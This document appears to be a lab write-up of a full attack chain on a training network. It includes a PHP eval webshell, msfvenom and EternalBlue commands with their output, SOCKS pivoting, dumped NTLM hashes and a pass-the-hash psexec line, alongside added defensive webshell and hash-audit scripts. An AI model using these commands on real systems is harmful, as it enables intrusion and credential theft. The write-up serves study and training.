cyberstrikelab-lab7
Web penetration
BageCMS on port 9652
PS C:\Users\xt350> fscan.exe -h 192.168.10.10 -p 1-65000
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.10.10:139 open
192.168.10.10:135 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.10:5040 open
192.168.10.10:7680 open
192.168.10.10:9652 open
192.168.10.10:49664 open
192.168.10.10:49666 open
192.168.10.10:49665 open
192.168.10.10:49669 open
192.168.10.10:49668 open
192.168.10.10:49667 open
192.168.10.10:49670 open
[*] alive ports len is: 14
start vulscan
[*] WebTitle http://192.168.10.10:9652 code:200 len:14625 title:网站标题-网站标题 - Powered By BageCMS
已完成 14/14
[*] 扫描结束,耗时: 4m16.0065058s
http://192.168.10.10:9652/install.txt
This file leaks the backend admin URL. Logging into the backend with the weak credentials admin / admin123456 shows the CMS version is BageCMS 3.1.0.

Edit the source of the site's homepage:
<?php @eval($_POST['a']);?>
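From the defender's side, the line above is the signature of a one-line PHP webshell. The following added check (written for this writeup, not part of the lab or of BageCMS; the sample template content is constructed) flags any PHP statement that passes a request superglobal into eval/assert or a command-execution function, and walks a web root looking for such lines.

```python
import os
import re
from typing import Iterator, List, Tuple

# PHP functions that turn a string into code or a shell command.
_SINKS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)"
# Request superglobals that any unauthenticated client controls.
_SOURCES = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["
# A sink whose argument list contains a request superglobal in the same
# statement, e.g. eval($_POST['a']) or system($_GET["cmd"]); the optional
# "@" (error suppression) is typical of one-liner shells.
WEBSHELL_RE = re.compile(r"@?\b" + _SINKS + r"\s*\([^;]*" + _SOURCES, re.I)

def find_webshell_lines(source: str) -> List[Tuple[int, str]]:
    """Return (line_number, stripped_line) for every line matching the pattern."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if WEBSHELL_RE.search(line):
            hits.append((lineno, line.strip()))
    return hits

def scan_webroot(root: str, exts=(".php", ".phtml", ".php5", ".inc")) -> Iterator[Tuple[str, int, str]]:
    """Walk a web root and yield (path, line_number, line) for every hit."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for lineno, line in find_webshell_lines(fh.read()):
                        yield path, lineno, line
            except OSError:
                continue

# Constructed sample: an ordinary template with the lab's one-liner appended,
# which is what a tampered index page looks like on disk.
SAMPLE_INDEX = """<?php
require_once 'config.php';
echo "<h1>" . htmlspecialchars($title) . "</h1>";
?>
<?php @eval($_POST['a']);?>
"""

if __name__ == "__main__":
    import sys
    for hit in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("%s:%d: %s" % hit)
```

Run it against the web root (C:\phpstudy_pro\WWW in this lab) and compare hits against a known-good copy of the CMS; obfuscated shells need additional signatures, this only catches the direct superglobal-to-sink form.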

Generate an msf payload, execute it, and catch the session with a handler:
msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z"

Internal network penetration
C:\phpstudy_pro\WWW>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ��̫��ʵ�� 0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::8c17:fbcc:901f:c897%6
IPv4 Address. . . . . . . . . . . : 192.168.10.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.233
Ethernet adapter ��̫��ʵ�� 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::fd48:8021:9701:9c1d%14
IPv4 Address. . . . . . . . . . . : 192.168.20.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.1
C:\phpstudy_pro\WWW>fscan.exe -h 192.168.20.10/24
fscan.exe -h 192.168.20.10/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 192.168.20.10 is alive
(icmp) Target 192.168.20.20 is alive
(icmp) Target 192.168.20.40 is alive
[*] Icmp alive hosts len is: 3
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.10:7680 open
192.168.20.40:88 open
192.168.20.20:3306 open
192.168.20.10:3306 open
192.168.20.40:445 open
192.168.20.40:139 open
192.168.20.20:139 open
192.168.20.10:139 open
192.168.20.40:135 open
192.168.20.20:135 open
192.168.20.10:135 open
[*] alive ports len is: 13
start vulscan
[+] NetInfo:
[*]192.168.20.40
[->]WIN-137FCI4D99A
[->]192.168.20.40
[+] NetInfo:
[*]192.168.20.20
[->]cyberweb
[->]192.168.20.20
[+] 192.168.20.40 MS17-010 (Windows Server 2016 Standard 14393)
[*] 192.168.20.40 [+]DC CYBERSTRIKELAB\WIN-137FCI4D99A Windows Server 2016 Standard 14393
[*] 192.168.20.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600
已完成 13/13
[*] 扫描结束,耗时: 14.733617s
The domain controller is 192.168.20.40 and is vulnerable to EternalBlue (MS17-010). Use the msf command-execution module to read the second flag:
use admin/smb/ms17_010_command
set command type c:\\flag.txt
set rhosts 192.168.20.40
run

Configure routing:
run post/multi/manage/autoroute
Set up a SOCKS proxy:
use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run -j
On the local machine, point Proxifier at the IP address and port of the msf SOCKS proxy on Kali.

Enable local resource sharing

Remote connection

Upload the msf bind payload

Configure msf and get ready to receive the session

Execute the payload via EternalBlue: the account we logged in with remotely is a normal user, not SYSTEM, so it cannot dump hashes, which is why EternalBlue is used to run the payload instead.
msf auxiliary(admin/smb/ms17_010_command) > set command C:\\Users\\xiaoyu\\Desktop\\shell.exe
command => C:\Users\xiaoyu\Desktop\shell.exe
msf auxiliary(admin/smb/ms17_010_command) > run
[*] 192.168.20.40:445 - Target OS: Windows Server 2016 Standard 14393
[*] 192.168.20.40:445 - Built a write-what-where primitive...
[+] 192.168.20.40:445 - Overwrite complete... SYSTEM session obtained!
[+] 192.168.20.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.20.40:445 - Getting the command output...
[*] 192.168.20.40:445 - Command finished with no output
[*] 192.168.20.40:445 - Executing cleanup...
[+] 192.168.20.40:445 - Cleanup was successful
[+] 192.168.20.40:445 - Command completed successfully!
[*] 192.168.20.40:445 - Output for "C:\Users\xiaoyu\Desktop\shell.exe":
[*] 192.168.20.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Because a bind connection is used, connect to the shell after the payload has executed:
msf auxiliary(admin/smb/ms17_010_command) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/bind_tcp
msf exploit(multi/handler) > show options
Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.20.40    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
View the full module info with the info, or info -d command.
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.
[*] Started bind TCP handler against 192.168.20.40:4444
msf exploit(multi/handler) > [*] Sending stage (177734 bytes) to 192.168.20.40
[*] Meterpreter session 4 opened (192.168.20.10:50929 -> 192.168.20.40:4444 via session 3) at 2025-12-11 02:21:05 -0500
msf exploit(multi/handler) > sessions
Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-JFB57A8  10.10.10.173:36245 -> 192.168.10.10:4444 (192.168.10.10)
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-137FCI4D99A  192.168.20.10:50929 -> 192.168.20.40:4444 via session 3 (192.168.20.40)
msf exploit(multi/handler) > sessions 4
[*] Starting interaction with 4...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Use msf's hashdump to obtain the domain controller's administrator hash:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8174fc8c5ee7a8e460df2e61d00bd3c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f230bc7afd28cc6d52aab59e6e31fd6a:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cyberweb:1106:aad3b435b51404eeaad3b435b51404ee:214352b7762ea8894f78edcbf5748a05:::
xiaoyu:1107:aad3b435b51404eeaad3b435b51404ee:73f5d97549f033374fa6d9f9ce247ffd:::
WIN-137FCI4D99A$:1000:aad3b435b51404eeaad3b435b51404ee:44ec20bd68d4e22d3428a97d15f441dd:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:664117f18ce890f00499a80e2fb92904:::
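A defender-side audit of a dump in this pwdump format, as an added example that is not part of the writeup (the sample lines are constructed, and the two constants are the public hashes of the empty password, not secrets): a user account whose NT field equals the empty-string NT hash has a blank password, a non-empty LM field means the legacy LM hash is still being stored, and identical NT hashes across accounts mean password reuse.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Public constants: the LM and NT hashes of the empty password (not secrets).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
BLANK_PASSWORD = "blank password (NT hash of the empty string)"
LM_STORED = "LM hash stored (legacy, trivially crackable)"
PASSWORD_REUSE = "identical NT hash (password reuse)"
# pwdump format as printed by hashdump: user:rid:lm:nt:::
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

def parse_pwdump(text: str) -> List[Dict[str, str]]:
    """Parse hashdump lines; lines that do not fit the format are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            rows.append({"user": d["user"], "rid": d["rid"], "lm": d["lm"].lower(), "nt": d["nt"].lower()})
    return rows

def audit(rows: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(account(s), finding) pairs. Machine accounts ('$') have random rotating passwords
    and skip the blank/reuse checks; the dump has no 'disabled' flag, so cross-check blank hits."""
    findings = []
    by_nt = defaultdict(list)
    for r in rows:
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], LM_STORED))
        if r["user"].endswith("$"):
            continue
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], BLANK_PASSWORD))
        else:
            by_nt[r["nt"]].append(r["user"])
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((",".join(sorted(users)), PASSWORD_REUSE))
    return findings

# Constructed sample in the format of the lab's hashdump output.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
legacy:1108:0123456789abcdef0123456789abcdef:33333333333333333333333333333333:::
SRV01$:1000:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
"""
```

Built-in accounts such as Guest and DefaultAccount normally carry the empty NT hash because they are disabled, so a blank-password finding on them is only a problem if the account is enabled.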
Pass-the-hash to 192.168.20.20 to take the last machine:
proxychains impacket-psexec -hashes :d8174fc8c5ee7a8e460df2e61d00bd3c cyberstrikelab.com/Administrator@192.168.20.20
